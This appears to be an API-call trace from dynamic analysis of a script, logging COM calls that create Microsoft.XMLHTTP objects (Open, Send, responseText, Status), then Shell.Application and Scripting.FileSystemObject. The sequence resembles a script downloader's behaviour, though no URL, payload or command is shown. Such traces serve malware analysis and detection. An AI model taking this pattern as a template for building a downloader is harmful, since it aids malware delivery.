	[0687.650] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0687.650] SysStringLen (param_1=0x0) returned 0x0
	[0687.650] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0687.650] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0687.650] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0687.650] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0687.650] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0687.650] ??2@YAPEAX_K@Z () returned 0x62f310
	[0687.650] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0687.650] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0687.650] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0687.650] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0687.650] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0687.651] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0687.651] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0687.651] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0687.651] longjmp () 
	[0687.651] longjmp () 
	[0687.652] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0687.652] SysStringLen (param_1=0x0) returned 0x0
	[0687.652] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0687.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0687.652] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0687.652] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0687.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0687.652] ??2@YAPEAX_K@Z () returned 0x62f330
	[0687.652] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0687.652] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0687.652] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0687.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0687.652] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0687.653] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0687.653] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0687.653] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0687.653] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0687.653] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0687.653] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0691.225] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0691.225] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0691.225] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0691.225] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0691.226] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0691.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0691.226] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0691.226] SysStringLen (param_1=0x0) returned 0x0
	[0691.226] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0691.226] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0691.226] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0691.226] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0691.226] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0691.226] ??2@YAPEAX_K@Z () returned 0x62f350
	[0691.226] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0691.226] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0691.227] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0691.227] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0691.227] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0691.227] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0691.227] SysStringLen (param_1=0x0) returned 0x0
	[0691.227] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0691.230] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0691.230] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0691.230] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0691.230] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0691.231] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0691.231] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0692.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0692.839] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0692.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0692.841] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0692.841] SysStringLen (param_1=0x0) returned 0x0
	[0692.841] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0692.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0692.841] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0692.841] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0692.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0692.841] ??2@YAPEAX_K@Z () returned 0x62f330
	[0692.841] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0692.841] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0692.842] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0692.842] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0692.842] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0692.842] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0692.842] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0692.844] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0692.845] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0692.845] SysStringLen (param_1=0x0) returned 0x0
	[0692.845] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0692.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0692.845] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0692.845] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0692.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0692.845] ??2@YAPEAX_K@Z () returned 0x62f310
	[0692.845] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f310) 
	[0692.845] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0692.845] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0692.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0692.846] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0692.846] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0692.846] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0692.846] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
